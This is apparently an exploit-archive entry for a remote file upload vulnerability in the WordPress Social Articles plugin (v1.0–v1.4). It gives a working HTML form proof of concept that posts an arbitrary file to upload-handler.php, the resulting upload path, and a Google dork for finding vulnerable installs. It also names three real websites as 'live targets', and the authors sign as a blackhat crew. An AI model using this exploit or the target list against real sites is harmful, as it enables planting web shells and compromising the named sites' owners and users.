WordPress Plugins Social Articles Remote File Upload Vulnerability

2013-11-05T00:00:00
ID 1337DAY-ID-21461
Type zdt
Reporter Byakuya
Modified 2013-11-05T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ###################################################################################################
#_________            .___        _______                ___.   .__        
#\_   ___ \  ____   __| _/____    \      \   ______  _  _\_ |__ |__| ____  
#/    \  \/ /  _ \ / __ |/ __ \   /   |   \_/ __ \ \/ \/ /| __ \|  |/ __ \ 
#\     \___(  <_> ) /_/ \  ___/  /    |    \  ___/\     / | \_\ \  \  ___/ 
# \______  /\____/\____ |\___  > \____|__  /\___  >\/\_/  |___  /__|\___  >
#        \/            \/    \/          \/     \/            \/        \/ 
###################################################################################################
# Exploit Title: WordPress Plugins Social Articles Remote File Upload Vulnerability
# Author: Byakuya
# Date: 11/05/2013
# Vendor Homepage: http://wordpress.org/
# Plugins Link: http://wordpress.org/plugins/social-articles/
# Extension: .jpg , .png , .gif
# Affected Version: v1.0 - v1.4
# Infected File: upload-handler.php
# Category: webapps
# Google dork: inurl:wp-content/plugins/social-articles
# Tested on : Windows/Linux
# Description : WordPress plugins Social Articles suffers from a remote file upload vulnerability.
###################################################################################################

# Exploit & POC :

<form enctype="multipart/form-data" 
action="https://127.0.0.1/wordpress/wp-content/plugins/social-articles/upload-handler.php" method="post">
Please choose a file: <input name="userfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

#File path: 
http://127.0.0.1/wordpress/wp-content/uploads/[upload result name]

#Live Target :
http://thelayer.me/wp-content/plugins/social-articles/upload-handler.php
https://www.groovetemple.tv/wp-content/plugins/social-articles/upload-handler.php
http://news.costaricasun.com/wp-content/plugins/social-articles/upload-handler.php

#Credit: ./Byakuya ./Mr Ohsem ./Cai ./RatKid ./Agam ./Lord-Router ./X-Tuned ./Official Code-Newbie
#Facebook: https://www.facebook.com/CodeNewbieCrew
#Website: http://www.codenewbie.net
#Malaysia & Indonesia BlackHat
###################################################################################################

#  0day.today [2018-03-28]  #